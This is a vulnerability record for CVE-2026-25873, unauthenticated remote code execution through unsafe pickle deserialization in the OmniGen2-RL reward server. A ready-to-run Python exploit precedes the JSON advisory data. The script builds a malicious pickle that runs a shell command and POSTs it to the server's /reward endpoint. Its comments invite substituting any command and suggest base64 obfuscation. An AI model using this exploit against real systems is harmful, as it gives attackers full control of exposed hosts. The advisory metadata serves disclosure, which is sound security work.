CVE-2026-25873

import pickle import subprocess import requests import base64 # Create malicious pickle payload for RCE class RCE: def __reduce__(self): # Execute arbitrary command - replace 'id' with any command cmd = ['sh', '-c', 'id > /tmp/pwned'] return (subprocess.Popen, (cmd,)) # Serialize the malicious object payload = pickle.dumps(RCE()) # Send the malicious request to the target target_url = 'http://target:8000/reward' # Update with actual target URL headers = { 'Content-Type': 'application/octet-stream' } try: response = requests.post(target_url, data=payload, headers=headers) print(f'Status Code: {response.status_code}') print(f'Response: {response.text}') except requests.exceptions.RequestException as e: print(f'Request failed: {e}') # Alternative: Base64 encoded version for obfuscation # encoded_payload = base64.b64encode(payload).decode() # print(f'Base64 Payload: {encoded_payload}')

{"cve": {"id": "CVE-2026-25873", "sourceIdentifier": "[email protected]", "published": "2026-03-18T21:16:25.220", "lastModified": "2026-03-19T13:25:00.570", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OmniGen2-RL contains an unauthenticated remote code execution vulnerability in the reward server component that allows remote attackers to execute arbitrary commands by sending malicious HTTP POST requests. Attackers can exploit insecure pickle deserialization of request bodies to achieve code execution on the host system running the exposed service."}, {"lang": "es", "value": "OmniGen2-RL contiene una vulnerabilidad de ejecución remota de código no autenticada en el componente del servidor de recompensas que permite a atacantes remotos ejecutar comandos arbitrarios enviando solicitudes POST HTTP maliciosas. Los atacantes pueden explotar la deserialización pickle insegura de los cuerpos de las solicitudes para lograr la ejecución de código en el sistema anfitrión que ejecuta el servicio expuesto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://arxiv.org/abs/2506.18871", "source": "[email protected]"}, {"url": "https://chocapikk.com/posts/2026/omnigen2-pickle-rce/", "source": "[email protected]"}, {"url": "https://github.com/VectorSpaceLab/OmniGen2/blob/3a13017e532f9f309a38bca571fd62200a6415c5/OmniGen2-RL/reward_server/reward_proxy.py#L208", "source": "[email protected]"}, {"url": "https://github.com/VectorSpaceLab/OmniGen2/blob/3a13017e532f9f309a38bca571fd62200a6415c5/OmniGen2-RL/reward_server/reward_proxy.py#L224", "source": "[email protected]"}, {"url": "https://github.com/VectorSpaceLab/OmniGen2/blob/3a13017e532f9f309a38bca571fd62200a6415c5/OmniGen2-RL/reward_server/reward_server.py#L118", "source": "[email protected]"}, {"url": "https://github.com/VectorSpaceLab/OmniGen2/pull/139", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/omnigen2-rl-reward-server-unsafe-deserialization-rce", "source": "[email protected]"}]}}